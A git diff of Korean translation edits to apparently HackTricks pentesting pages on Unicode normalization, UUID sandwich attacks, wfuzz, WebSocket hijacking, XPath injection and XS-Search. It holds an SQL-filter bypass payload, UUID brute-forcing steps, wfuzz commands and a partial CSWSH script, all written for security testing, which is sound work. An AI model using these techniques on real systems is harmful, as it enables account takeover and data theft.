 유니코드 인코딩을 이해하는 것은 서로 다른 시스템이나 언어 간의 상호 운용성 문제를 다룰 때 특히 중요합니다. 주요 사항은 다음과 같습니다:
 
-- **코드 포인트와 문자**: 유니코드에서 각 문자 또는 기호는 "코드 포인트"라고 하는 숫자 값이 할당됩니다.
+- **코드 포인트 및 문자**: 유니코드에서 각 문자 또는 기호는 "코드 포인트"라고 하는 숫자 값이 할당됩니다.
 - **바이트 표현**: 코드 포인트(또는 문자)는 메모리에서 하나 이상의 바이트로 표현됩니다. 예를 들어, LATIN-1 문자는(영어 사용 국가에서 일반적) 하나의 바이트를 사용하여 표현됩니다. 그러나 더 많은 문자 집합을 가진 언어는 표현을 위해 더 많은 바이트가 필요합니다.
 - **인코딩**: 이 용어는 문자가 일련의 바이트로 변환되는 방식을 나타냅니다. UTF-8은 ASCII 문자가 하나의 바이트로 표현되고, 다른 문자는 최대 네 개의 바이트로 표현되는 일반적인 인코딩 표준입니다.
 - **데이터 처리**: 데이터를 처리하는 시스템은 바이트 스트림을 문자로 올바르게 변환하기 위해 사용된 인코딩을 인식해야 합니다.
@@ -33,7 +33,7 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
 
 ### 발견하기
 
-웹앱에서 반환되는 값을 찾을 수 있다면, **‘KELVIN SIGN’ (U+0212A)**을 보내보세요. 이는 **"K"로 정규화**됩니다 (이를 `%e2%84%aa`로 보낼 수 있습니다). **"K"가 반환된다면**, 어떤 종류의 **유니코드 정규화**가 수행되고 있는 것입니다.
+웹앱 내에서 반환되는 값을 찾을 수 있다면, **‘KELVIN SIGN’ (U+0212A)**을 보내보세요. 이는 **"K"로 정규화**됩니다 (이를 `%e2%84%aa`로 보낼 수 있습니다). **"K"가 반환된다면**, 어떤 종류의 **유니코드 정규화**가 수행되고 있는 것입니다.
 
 다른 **예시**: `%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83`는 **유니코드** 후에 `Leonishan`입니다.
 
@@ -43,7 +43,7 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
 
 사용자 입력으로 SQL 쿼리를 생성하는 데 문자 `'`를 사용하는 웹 페이지를 상상해 보세요. 이 웹은 보안 조치로 사용자 입력에서 문자 **`'`**의 모든 발생을 **삭제**하지만, **그 삭제 후**와 **쿼리 생성 전**에 사용자 입력을 **유니코드**로 **정규화**합니다.
 
-그렇다면, 악의적인 사용자는 `' (0x27)`에 해당하는 다른 유니코드 문자 `%ef%bc%87`을 삽입할 수 있습니다. 입력이 정규화되면 단일 인용부호가 생성되고 **SQL 인젝션 취약점**이 발생합니다:
+그런 다음, 악의적인 사용자는 `' (0x27)`에 해당하는 다른 유니코드 문자 `%ef%bc%87`을 삽입할 수 있습니다. 입력이 정규화되면 단일 인용부호가 생성되고 **SQL 인젝션 취약점**이 발생합니다:
 
 ![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../images/image (702).png>)
 
@@ -79,7 +79,7 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
 
 ### XSS (교차 사이트 스크립팅)
 
-웹앱을 속이고 XSS를 악용하기 위해 다음 문자 중 하나를 사용할 수 있습니다:
+다음 문자 중 하나를 사용하여 웹앱을 속이고 XSS를 악용할 수 있습니다:
 
 ![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../images/image (312) (2).png>)
 
@@ -89,9 +89,9 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
 
 ### 퍼징 정규 표현식
 
-백엔드가 **정규 표현식으로 사용자 입력을 확인할 때**, **입력**이 **정규 표현식**에 대해 **정규화**되지만 **사용되는 곳**에 대해서는 **정규화되지 않을** 수 있습니다. 예를 들어, Open Redirect 또는 SSRF에서 정규 표현식이 **전송된 URL을 정규화**할 수 있지만, 그 후 **있는 그대로 접근**할 수 있습니다.
+백엔드가 **사용자 입력을 정규 표현식으로 확인할 때**, **입력**이 **정규 표현식**에 대해 **정규화**되지만 **사용되는 곳**에 대해서는 **정규화되지 않을** 수 있습니다. 예를 들어, Open Redirect 또는 SSRF에서 정규 표현식이 **전송된 URL을 정규화**할 수 있지만, 그 후 **있는 그대로 접근**할 수 있습니다.
 
-도구 [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\*는 백엔드를 퍼징하기 위해 **입력의 변형을 생성**할 수 있습니다. 더 많은 정보는 **github**와 이 [**게시물**](https://0xacb.com/2022/11/21/recollapse/)을 확인하세요.
+도구 [**recollapse**](https://github.com/0xacb/recollapse) \*\*\*\*는 백엔드를 퍼징하기 위해 **입력의 변형을 생성**할 수 있게 해줍니다. 더 많은 정보는 **github**와 이 [**게시물**](https://0xacb.com/2022/11/21/recollapse/)을 확인하세요.
 
 ## 참고 문헌
 
diff --git a/src/pentesting-web/uuid-insecurities.md b/src/pentesting-web/uuid-insecurities.md
index eb16f1e87..c812ca603 100644
--- a/src/pentesting-web/uuid-insecurities.md
+++ b/src/pentesting-web/uuid-insecurities.md
@@ -23,7 +23,7 @@ UUID는 고유하고 **추측하기 어렵도록 설계되었습니다**. 이들
 
 ## 샌드위치 공격
 
-"샌드위치 공격"은 **웹 애플리케이션에서 UUID v1 생성의 예측 가능성을 악용하는 특정 유형의 공격**입니다. 특히 비밀번호 재설정과 같은 기능에서 그렇습니다. UUID v1은 시간, 클록 시퀀스 및 노드의 MAC 주소를 기반으로 생성되므로 공격자가 이러한 UUID 중 일부를 시간에 가깝게 얻을 수 있다면 다소 예측 가능할 수 있습니다.
+"샌드위치 공격"은 **웹 애플리케이션에서 UUID v1 생성의 예측 가능성을 악용하는 특정 유형의 공격**입니다. 특히 비밀번호 재설정과 같은 기능에서 그렇습니다. UUID v1은 시간, 클록 시퀀스 및 노드의 MAC 주소를 기반으로 생성되므로 공격자가 이러한 UUID 중 일부를 시간에 가까운 시점에서 얻을 수 있다면 다소 예측 가능할 수 있습니다.
 
 ### 예시
 
@@ -37,19 +37,19 @@ UUID v1을 사용하여 비밀번호 재설정 링크를 생성하는 웹 애플
 2. **실행**:
 
 - 공격자는 첫 번째 계정 (\`attacker1@acme.com\`)에 대한 비밀번호 재설정을 트리거하고 UUID가 포함된 비밀번호 재설정 링크를 받습니다. 예를 들어 \`99874128-7592-11e9-8201-bb2f15014a14\`입니다.
-- 그 직후, 공격자는 피해자의 계정 (\`victim@acme.com\`)에 대한 비밀번호 재설정을 트리거하고, 그 다음 빠르게 두 번째 공격자 제어 계정 (\`attacker2@acme.com\`)에 대해 트리거합니다.
+- 그 직후, 공격자는 피해자의 계정 (\`victim@acme.com\`)에 대한 비밀번호 재설정을 트리거하고, 이어서 두 번째 공격자 제어 계정 (\`attacker2@acme.com\`)에 대해 신속하게 트리거합니다.
 - 공격자는 두 번째 계정에 대한 재설정 링크를 UUID와 함께 받습니다. 예를 들어 \`998796b4-7592-11e9-8201-bb2f15014a14\`입니다.
 
 3. **분석**:
 
-- 공격자는 이제 시간에 가깝게 생성된 두 개의 UUID (\`99874128\` 및 \`998796b4\`)를 가지고 있습니다. 시간 기반 UUID의 순차적 특성을 고려할 때, 피해자의 계정에 대한 UUID는 이 두 값 사이에 있을 가능성이 높습니다.
+- 공격자는 이제 시간에 가까운 두 개의 UUID (\`99874128\` 및 \`998796b4\`)를 가지고 있습니다. 시간 기반 UUID의 순차적 특성을 고려할 때, 피해자의 계정에 대한 UUID는 이 두 값 사이에 있을 가능성이 높습니다.
 
-4. **무차별 대입 공격**:
+4. **무차별 대입 공격:**
 
-- 공격자는 이 두 값 사이의 UUID를 생성하는 도구를 사용하고, 생성된 각 UUID를 비밀번호 재설정 링크에 접근하려고 시도하여 테스트합니다 (예: \`https://www.acme.com/reset/\<generated-UUID>\`).
-- 웹 애플리케이션이 이러한 시도를 적절히 속도 제한하거나 차단하지 않으면, 공격자는 범위 내의 모든 가능한 UUID를 빠르게 테스트할 수 있습니다.
+- 공격자는 이 두 값 사이의 UUID를 생성하는 도구를 사용하고, 생성된 각 UUID를 비밀번호 재설정 링크에 접근하여 테스트합니다 (예: \`https://www.acme.com/reset/\<generated-UUID>\`).
+- 웹 애플리케이션이 이러한 시도를 적절히 속도 제한하거나 차단하지 않으면, 공격자는 범위 내의 모든 가능한 UUID를 신속하게 테스트할 수 있습니다.
 
-5. **접근 획득**:
+5. **접근 획득:**
 
 - 피해자의 비밀번호 재설정 링크에 대한 올바른 UUID가 발견되면, 공격자는 피해자의 비밀번호를 재설정하고 그들의 계정에 무단으로 접근할 수 있습니다.
 
diff --git a/src/pentesting-web/web-tool-wfuzz.md b/src/pentesting-web/web-tool-wfuzz.md
index a38830c8b..34ec23099 100644
--- a/src/pentesting-web/web-tool-wfuzz.md
+++ b/src/pentesting-web/web-tool-wfuzz.md
@@ -1,4 +1,4 @@
-# Web Tool - WFuzz
+# 웹 도구 - WFuzz
 
 {{#include ../banners/hacktricks-training.md}}
 
@@ -6,7 +6,7 @@
 
 > [Wfuzz](https://github.com/xmendez/wfuzz)는 웹 애플리케이션 평가 작업을 용이하게 하기 위해 만들어졌으며, 간단한 개념에 기반합니다: FUZZ 키워드에 대한 모든 참조를 주어진 페이로드의 값으로 대체합니다.
 
-## Installation
+## 설치
 
 Kali에 설치됨
 
@@ -64,7 +64,7 @@ wfuzz -c -w users.txt -w pass.txt --ss "Welcome " -p 127.0.0.1:8080:HTTP -b "PHP
 ```
 ### Bruteforce Directory/RESTful bruteforce
 
-[Arjun parameters wordlist](https://raw.githubusercontent.com/s0md3v/Arjun/master/arjun/db/params.txt)
+[Arjun 매개변수 단어 목록](https://raw.githubusercontent.com/s0md3v/Arjun/master/arjun/db/params.txt)
 ```
 wfuzz -c -w /tmp/tmp/params.txt --hc 404 https://domain.com/api/FUZZ
 ```
diff --git a/src/pentesting-web/web-vulnerabilities-methodology.md b/src/pentesting-web/web-vulnerabilities-methodology.md
index ae357cc43..2e2455c81 100644
--- a/src/pentesting-web/web-vulnerabilities-methodology.md
+++ b/src/pentesting-web/web-vulnerabilities-methodology.md
@@ -22,7 +22,7 @@
 
 > [!NOTE]
 > 대부분의 웹 애플리케이션은 **사용자가 나중에 처리될 데이터를 입력할 수 있도록 허용합니다.**\
-> 데이터의 구조에 따라 서버가 기대하는 취약점이 적용될 수도 있고 그렇지 않을 수도 있습니다.
+> 데이터의 구조에 따라 서버가 기대하는 경우 일부 취약점이 적용될 수도 있고 그렇지 않을 수도 있습니다.
 
 ### **반사된 값**
 
@@ -31,7 +31,7 @@
 - [ ] [**클라이언트 측 템플릿 주입**](client-side-template-injection-csti.md)
 - [ ] [**명령 주입**](command-injection.md)
 - [ ] [**CRLF**](crlf-0d-0a.md)
-- [ ] [**덩글링 마크업**](dangling-markup-html-scriptless-injection/)
+- [ ] [**덩어리 마크업**](dangling-markup-html-scriptless-injection/)
 - [ ] [**파일 포함/경로 탐색**](file-inclusion/)
 - [ ] [**열린 리다이렉트**](open-redirect.md)
 - [ ] [**프로토타입 오염을 통한 XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
@@ -93,7 +93,7 @@ pocs-and-polygloths-cheatsheet/
 
 ### **구조화된 객체 / 특정 기능**
 
-일부 기능은 **데이터가 매우 특정한 형식으로 구조화되어야** 합니다 (예: 언어 직렬화 객체 또는 XML). 따라서 애플리케이션이 해당 종류의 데이터를 처리해야 하므로 취약점을 식별하기가 더 쉽습니다.\
+일부 기능은 **데이터가 매우 특정한 형식으로 구조화되어야** 합니다 (예: 언어 직렬화 객체 또는 XML). 따라서 애플리케이션이 해당 유형의 데이터를 처리해야 하므로 취약점을 식별하기가 더 쉽습니다.\
 일부 **특정 기능**은 **특정 형식의 입력이 사용될 경우** 취약할 수 있습니다 (예: 이메일 헤더 주입).
 
 - [ ] [**역직렬화**](deserialization/)
diff --git a/src/pentesting-web/web-vulnerabilities-methodology/README.md b/src/pentesting-web/web-vulnerabilities-methodology/README.md
index 56d2064a8..95b5c7ede 100644
--- a/src/pentesting-web/web-vulnerabilities-methodology/README.md
+++ b/src/pentesting-web/web-vulnerabilities-methodology/README.md
@@ -31,9 +31,9 @@
 - [ ] [**클라이언트 측 템플릿 주입**](../client-side-template-injection-csti.md)
 - [ ] [**명령 주입**](../command-injection.md)
 - [ ] [**CRLF**](../crlf-0d-0a.md)
-- [ ] [**덩어리 마크업**](../dangling-markup-html-scriptless-injection/)
+- [ ] [**덩글링 마크업**](../dangling-markup-html-scriptless-injection/)
 - [ ] [**파일 포함/경로 탐색**](../file-inclusion/)
-- [ ] [**열린 리다이렉트**](../open-redirect.md)
+- [ ] [**오픈 리다이렉트**](../open-redirect.md)
 - [ ] [**프로토타입 오염을 통한 XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)
 - [ ] [**서버 측 포함/엣지 측 포함**](../server-side-inclusion-edge-side-inclusion-injection.md)
 - [ ] [**서버 측 요청 위조**](../ssrf-server-side-request-forgery/)
@@ -61,9 +61,9 @@
 - [ ] [**SQL 주입**](../sql-injection/)
 - [ ] [**XPATH 주입**](../xpath-injection.md)
 
-### **양식, 웹소켓 및 PostMsg**
+### **폼, 웹소켓 및 PostMsg**
 
-웹소켓이 메시지를 게시하거나 사용자가 작업을 수행할 수 있도록 하는 양식이 있을 때 취약점이 발생할 수 있습니다.
+웹소켓이 메시지를 게시하거나 사용자가 작업을 수행할 수 있도록 하는 폼이 있을 때 취약점이 발생할 수 있습니다.
 
 - [ ] [**교차 사이트 요청 위조**](../csrf-cross-site-request-forgery.md)
 - [ ] [**교차 사이트 웹소켓 탈취 (CSWSH)**](../websocket-attacks.md)
@@ -80,7 +80,7 @@
 
 ### **우회**
 
-일부 특정 기능에서는 우회할 수 있는 몇 가지 해결 방법이 유용할 수 있습니다.
+일부 특정 기능에서는 우회하는 데 유용할 수 있는 여러 가지 해결 방법이 있습니다.
 
 - [ ] [**2FA/OTP 우회**](../2fa-bypass.md)
 - [ ] [**결제 프로세스 우회**](../bypass-payment-process.md)
@@ -105,7 +105,7 @@
 
 파일 업로드를 허용하는 기능은 여러 문제에 취약할 수 있습니다.\
 사용자 입력을 포함한 파일을 생성하는 기능은 예기치 않은 코드를 실행할 수 있습니다.\
-사용자가 업로드한 파일이나 사용자 입력을 포함한 자동 생성된 파일을 열면 위험에 처할 수 있습니다.
+사용자가 업로드한 파일이나 사용자 입력을 포함하여 자동으로 생성된 파일을 열면 위험에 처할 수 있습니다.
 
 - [ ] [**파일 업로드**](../file-upload/)
 - [ ] [**수식 주입**](../formula-csv-doc-latex-ghostscript-injection.md)
diff --git a/src/pentesting-web/websocket-attacks.md b/src/pentesting-web/websocket-attacks.md
index 70aa5536d..75e575375 100644
--- a/src/pentesting-web/websocket-attacks.md
+++ b/src/pentesting-web/websocket-attacks.md
@@ -4,7 +4,7 @@
 
 ## WebSocket이란 무엇인가
 
-WebSocket 연결은 초기 **HTTP** 핸드셰이크를 통해 설정되며, **장기 지속**을 위해 설계되어 언제든지 양방향 메시징이 가능하게 하여 거래 시스템이 필요하지 않습니다. 이는 WebSocket이 실시간 금융 데이터 스트림과 같은 **저지연 또는 서버 시작 통신**이 필요한 애플리케이션에 특히 유리하게 만듭니다.
+WebSocket 연결은 초기 **HTTP** 핸드셰이크를 통해 설정되며, **장기 지속**을 위해 설계되어 언제든지 양방향 메시징이 가능하게 하여 거래 시스템이 필요하지 않습니다. 이는 WebSocket이 실시간 금융 데이터 스트림과 같은 **저지연 또는 서버 시작 통신**을 요구하는 애플리케이션에 특히 유리하게 만듭니다.
 
 ### WebSocket 연결의 설정
 
@@ -14,7 +14,7 @@ var ws = new WebSocket("wss://normal-website.com/ws")
 ```
 `wss` 프로토콜은 **TLS**로 보호된 WebSocket 연결을 의미하며, `ws`는 **보안되지 않은** 연결을 나타냅니다.
 
-연결 설정 중에 브라우저와 서버 간에 HTTP를 통한 핸드셰이크가 수행됩니다. 핸드셰이크 과정은 브라우저가 요청을 보내고 서버가 응답하는 것으로 구성되며, 다음 예시에서 설명됩니다:
+연결 설정 중에 브라우저와 서버 간에 HTTP를 통해 핸드셰이크가 수행됩니다. 핸드셰이크 과정은 브라우저가 요청을 보내고 서버가 응답하는 것으로 구성되며, 다음 예시에서 설명됩니다:
 
 브라우저가 핸드셰이크 요청을 보냅니다:
 ```javascript
@@ -39,7 +39,7 @@ Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=
 
 - `Connection` 및 `Upgrade` 헤더는 WebSocket 핸드셰이크의 시작을 알립니다.
 - `Sec-WebSocket-Version` 헤더는 원하는 WebSocket 프로토콜 버전을 나타내며, 일반적으로 `13`입니다.
-- Base64로 인코딩된 임의 값이 `Sec-WebSocket-Key` 헤더에 전송되어 각 핸드셰이크가 고유하도록 보장하며, 이는 캐싱 프록시와 관련된 문제를 방지하는 데 도움이 됩니다. 이 값은 인증을 위한 것이 아니라 응답이 잘못 구성된 서버나 캐시에서 생성되지 않았음을 확인하기 위한 것입니다.
+- Base64로 인코딩된 임의 값이 `Sec-WebSocket-Key` 헤더에 전송되어 각 핸드셰이크가 고유하도록 보장하며, 이는 캐싱 프록시 문제를 방지하는 데 도움이 됩니다. 이 값은 인증을 위한 것이 아니라 응답이 잘못 구성된 서버나 캐시에서 생성되지 않았음을 확인하기 위한 것입니다.
 - 서버의 응답에 있는 `Sec-WebSocket-Accept` 헤더는 `Sec-WebSocket-Key`의 해시로, WebSocket 연결을 열려는 서버의 의도를 검증합니다.
 
 이러한 기능은 핸드셰이크 프로세스가 안전하고 신뢰할 수 있도록 보장하여 효율적인 실시간 통신을 위한 길을 열어줍니다.
@@ -50,7 +50,7 @@ Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=
 ```bash
 websocat --insecure wss://10.10.10.10:8000 -v
 ```
-웹소켓 서버를 생성하려면:
+웹소캣 서버를 생성하려면:
 ```bash
 websocat -s 0.0.0.0:8000 #Listen in port 8000
 ```
@@ -72,11 +72,11 @@ websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
 - [**WSSiP**](https://github.com/nccgroup/wssip)**:** "**WebSocket/Socket.io Proxy**"의 약자로, Node.js로 작성된 이 도구는 클라이언트와 서버 간의 모든 WebSocket 및 Socket.IO 통신을 **캡처, 가로채기, 사용자 정의** 메시지를 전송하고 볼 수 있는 사용자 인터페이스를 제공합니다.
 - [**wsrepl**](https://github.com/doyensec/wsrepl)는 침투 테스트를 위해 특별히 설계된 **대화형 웹소켓 REPL**입니다. 이는 **들어오는 웹소켓 메시지를 관찰하고 새로운 메시지를 전송**할 수 있는 인터페이스를 제공하며, 이 통신을 **자동화**하기 위한 사용하기 쉬운 프레임워크를 제공합니다.&#x20;
 - [**https://websocketking.com/**](https://websocketking.com/)는 **웹소켓**을 사용하여 다른 웹과 **통신**하는 **웹**입니다.
-- [**https://hoppscotch.io/realtime/websocket**](https://hoppscotch.io/realtime/websocket) 다양한 통신/프로토콜 중에서, **웹소켓**을 사용하여 다른 웹과 **통신**하는 **웹**을 제공합니다.
+- [**https://hoppscotch.io/realtime/websocket**](https://hoppscotch.io/realtime/websocket)는 다른 유형의 통신/프로토콜 중에서 **웹소켓**을 사용하여 다른 웹과 **통신**하는 **웹**을 제공합니다.
 
 ## Websocket Lab
 
-[**Burp-Suite-Extender-Montoya-Course**](https://github.com/federicodotta/Burp-Suite-Extender-Montoya-Course)에서 웹소켓을 사용하여 웹을 시작하는 코드를 찾을 수 있으며, [**이 게시물**](https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-the-montoya-way-part-3/)에서 설명을 찾을 수 있습니다.
+[**Burp-Suite-Extender-Montoya-Course**](https://github.com/federicodotta/Burp-Suite-Extender-Montoya-Course)에서는 웹소켓을 사용하여 웹을 시작하는 코드를 제공하며, [**이 게시물**](https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-the-montoya-way-part-3/)에서는 설명을 찾을 수 있습니다.
 
 ## Cross-site WebSocket hijacking (CSWSH)
 
@@ -86,9 +86,9 @@ websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
 
 ### Simple Attack
 
-**웹소켓** 연결을 **설정할** 때 **쿠키**가 **서버**에 **전송**된다는 점에 유의하십시오. **서버**는 이를 사용하여 **전송된 쿠키**를 기반으로 각 **특정** **사용자**와 그의 **웹소켓** **세션**을 **연관**시킬 수 있습니다.
+**웹소켓** 연결을 **설정할 때** **쿠키**가 **서버**로 **전송**된다는 점에 유의하십시오. **서버**는 이를 사용하여 **전송된 쿠키**를 기반으로 각 **특정** **사용자**와 그의 **웹소켓** **세션**을 **연관**시킬 수 있습니다.
 
-그런 다음, 예를 들어 **웹소켓** **서버**가 사용자의 대화 **히스토리**를 **전송**하는 경우, "**READY"**라는 메시지가 전송되면, **단순 XSS**가 연결을 설정하고 ( **쿠키**가 피해자 사용자를 인증하기 위해 **자동으로 전송**됨) "**READY**"를 전송하면 **대화**의 **히스토리**를 **가져올** 수 있습니다.
+그런 다음, 예를 들어 **웹소켓** **서버**가 사용자의 대화 **히스토리**를 **전송**하는 경우, "**READY"**라는 메시지가 전송되면, **단순 XSS**가 연결을 설정하고 (이때 **쿠키**는 피해자 사용자를 인증하기 위해 **자동으로 전송**됨) "**READY**"를 전송하면 **대화**의 **히스토리**를 **가져올** 수 있습니다.
 ```markup
 <script>
 websocket = new WebSocket('wss://your-websocket-URL')
@@ -140,11 +140,11 @@ WebSockets에서 레이스 조건도 존재합니다, [더 알아보려면 이 
 
 ## 기타 취약점
 
-Web Sockets는 **서버 측과 클라이언트 측에 데이터를 전송하는 메커니즘**이므로, 서버와 클라이언트가 정보를 처리하는 방식에 따라, **Web Sockets는 XSS, SQLi 또는 웹에서 일반적으로 발생하는 취약점을 웹소켓의 사용자 입력을 사용하여 악용하는 데 사용될 수 있습니다.**
+Web Sockets는 **서버 측과 클라이언트 측에 데이터를 전송하는 메커니즘**으로, 서버와 클라이언트가 정보를 처리하는 방식에 따라 **Web Sockets는 XSS, SQLi 또는 웹에서 일반적으로 발생하는 취약점을 웹소켓의 사용자 입력을 사용하여 악용하는 데 사용될 수 있습니다.**
 
 ## **WebSocket 스머글링**
 
-이 취약점은 **역방향 프록시 제한을 우회**할 수 있게 해주며, **웹소켓 통신이 설정되었다고 믿게 만들 수 있습니다** (사실이 아니더라도). 이는 공격자가 **숨겨진 엔드포인트에 접근**할 수 있게 할 수 있습니다. 더 많은 정보는 다음 페이지를 확인하세요:
+이 취약점은 **역방향 프록시 제한을 우회할 수 있게 해줍니다**. 이를 통해 **웹소켓 통신이 설정되었다고 믿게 만들 수 있습니다** (사실이 아니더라도). 이는 공격자가 **숨겨진 엔드포인트에 접근할 수 있게 할 수 있습니다**. 더 많은 정보는 다음 페이지를 확인하세요:
 
 {{#ref}}
 h2c-smuggling.md
diff --git a/src/pentesting-web/xpath-injection.md b/src/pentesting-web/xpath-injection.md
index e60568cee..676643896 100644
--- a/src/pentesting-web/xpath-injection.md
+++ b/src/pentesting-web/xpath-injection.md
@@ -24,7 +24,7 @@ XPath Injection으로 알려진 공격 기법은 사용자 입력을 기반으
 - **bookstore**: "bookstore"라는 이름을 가진 모든 노드가 선택됩니다.
 - **/bookstore**: 루트 요소 bookstore가 선택됩니다. 슬래시 (/)로 시작하는 경로는 요소에 대한 절대 경로를 나타냅니다.
 - **bookstore/book**: bookstore의 자식인 모든 book 요소가 선택됩니다.
-- **//book**: 문서 내의 모든 book 요소가 선택됩니다, 위치에 관계없이.
+- **//book**: 문서 내 모든 book 요소가 선택됩니다, 위치에 관계없이.
 - **bookstore//book**: bookstore 요소의 자손인 모든 book 요소가 선택됩니다, bookstore 요소 아래의 위치에 관계없이.
 - **//@lang**: lang이라는 이름을 가진 모든 속성이 선택됩니다.
 
@@ -32,7 +32,7 @@ XPath Injection으로 알려진 공격 기법은 사용자 입력을 기반으
 
 선택을 세분화하기 위해 술어가 사용됩니다:
 
-- **/bookstore/book\[1]**: bookstore 요소의 첫 번째 book 요소 자식이 선택됩니다. IE 5에서 9 버전의 경우 첫 번째 노드를 \[0]으로 인덱싱하는 문제를 해결하기 위해 JavaScript를 통해 SelectionLanguage를 XPath로 설정합니다.
+- **/bookstore/book\[1]**: bookstore 요소의 첫 번째 book 요소 자식이 선택됩니다. IE 버전 5에서 9까지의 경우 첫 번째 노드를 \[0]으로 인덱싱하는 우회 방법은 JavaScript를 통해 SelectionLanguage를 XPath로 설정하는 것입니다.
 - **/bookstore/book\[last()]**: bookstore 요소의 마지막 book 요소 자식이 선택됩니다.
 - **/bookstore/book\[last()-1]**: bookstore 요소의 마지막에서 두 번째 book 요소 자식이 선택됩니다.
 - **/bookstore/book\[position()<3]**: bookstore 요소의 첫 두 book 요소 자식이 선택됩니다.
@@ -52,7 +52,7 @@ XPath Injection으로 알려진 공격 기법은 사용자 입력을 기반으
 추가 예는 다음과 같습니다:
 
 - **/bookstore/\***: bookstore 요소의 모든 자식 요소 노드가 선택됩니다.
-- **//\***: 문서 내의 모든 요소가 선택됩니다.
+- **//\***: 문서 내 모든 요소가 선택됩니다.
 - **//title\[@\*]**: 적어도 하나의 속성이 있는 모든 title 요소가 선택됩니다.
 
 ## Example
diff --git a/src/pentesting-web/xs-search.md b/src/pentesting-web/xs-search.md
index c40379eb4..24c974fbe 100644
--- a/src/pentesting-web/xs-search.md
+++ b/src/pentesting-web/xs-search.md
@@ -10,7 +10,7 @@ XS-Search는 **사이드 채널 취약점**을 활용하여 **교차 출처 정
 
 - **취약한 웹**: 정보가 추출될 대상 웹사이트.
 - **공격자의 웹**: 피해자가 방문하는 공격자가 만든 악성 웹사이트로, 익스플로잇을 호스팅합니다.
-- **포함 방법**: 취약한 웹을 공격자의 웹에 통합하는 데 사용되는 기술(예: window.open, iframe, fetch, href가 있는 HTML 태그 등).
+- **포함 방법**: 취약한 웹을 공격자의 웹에 통합하기 위해 사용되는 기술(예: window.open, iframe, fetch, href가 있는 HTML 태그 등).
 - **유출 기술**: 포함 방법을 통해 수집된 정보를 기반으로 취약한 웹의 상태 차이를 식별하는 데 사용되는 기술.
 - **상태**: 공격자가 구별하고자 하는 취약한 웹의 두 가지 잠재적 조건.
 - **감지 가능한 차이**: 공격자가 취약한 웹의 상태를 추론하는 데 의존하는 관찰 가능한 변동.
@@ -19,10 +19,10 @@ XS-Search는 **사이드 채널 취약점**을 활용하여 **교차 출처 정
 
 취약한 웹의 상태를 구별하기 위해 분석할 수 있는 여러 측면이 있습니다:
 
-- **상태 코드**: 서버 오류, 클라이언트 오류 또는 인증 오류와 같은 **다양한 HTTP 응답 상태 코드**를 교차 출처에서 구별합니다.
+- **상태 코드**: 서버 오류, 클라이언트 오류 또는 인증 오류와 같은 **다양한 HTTP 응답 상태 코드**를 교차 출처로 구별합니다.
 - **API 사용**: 특정 JavaScript 웹 API를 사용하는지 여부를 드러내는 **웹 API 사용**을 식별합니다.
 - **리디렉션**: HTTP 리디렉션뿐만 아니라 JavaScript 또는 HTML에 의해 트리거된 다른 페이지로의 탐색을 감지합니다.
-- **페이지 콘텐츠**: **HTTP 응답 본문** 또는 페이지 하위 리소스에서의 **변동 관찰**, 예를 들어 **임베디드 프레임의 수** 또는 이미지 크기 차이.
+- **페이지 콘텐츠**: **HTTP 응답 본문** 또는 페이지 하위 리소스에서의 **변동 관찰**, 예를 들어 **임베디드 프레임의 수** 또는 이미지의 크기 차이.
 - **HTTP 헤더**: **특정 HTTP 응답 헤더**의 존재 또는 값(예: X-Frame-Options, Content-Disposition, Cross-Origin-Resource-Policy)을 주목합니다.
 - **타이밍**: 두 상태 간의 일관된 시간 차이를 감지합니다.
 
@@ -40,11 +40,11 @@ XS-Search는 **사이드 채널 취약점**을 활용하여 **교차 출처 정
 - **전역 한계**: 메모리 용량이나 다른 강제 브라우저 한계와 같은 브라우저의 물리적 제한은 임계값에 도달했을 때 신호를 보낼 수 있으며, 이는 유출 기술로 작용할 수 있습니다.
 - **전역 상태**: 브라우저의 **전역 상태**(예: History 인터페이스)와의 감지 가능한 상호작용을 악용할 수 있습니다. 예를 들어, 브라우저의 기록에 있는 **항목 수**는 교차 출처 페이지에 대한 단서를 제공할 수 있습니다.
 - **성능 API**: 이 API는 **현재 페이지의 성능 세부정보**를 제공하며, 문서 및 로드된 리소스에 대한 네트워크 타이밍을 포함하여 요청된 리소스에 대한 추론을 가능하게 합니다.
-- **읽을 수 있는 속성**: 일부 HTML 속성은 **교차 출처에서 읽을 수 있으며**, 유출 기술로 사용될 수 있습니다. 예를 들어, `window.frame.length` 속성은 JavaScript가 교차 출처 웹페이지에 포함된 프레임의 수를 계산할 수 있게 합니다.
+- **읽기 가능한 속성**: 일부 HTML 속성은 **교차 출처에서 읽을 수 있으며**, 유출 기술로 사용될 수 있습니다. 예를 들어, `window.frame.length` 속성은 JavaScript가 교차 출처 웹페이지에 포함된 프레임의 수를 계산할 수 있게 합니다.
 
 ## XSinator 도구 및 논문
 
-XSinator는 여러 알려진 XS-Leaks에 대해 **브라우저를 검사하는 자동 도구**로, 그 논문에서 설명됩니다: [**https://xsinator.com/paper.pdf**](https://xsinator.com/paper.pdf)
+XSinator는 **여러 알려진 XS-Leaks**에 대해 브라우저를 **검사하는 자동 도구**로, 그 논문에서 설명됩니다: [**https://xsinator.com/paper.pdf**](https://xsinator.com/paper.pdf)
 
 도구에 **접근할 수 있는 곳**: [**https://xsinator.com/**](https://xsinator.com/)
 
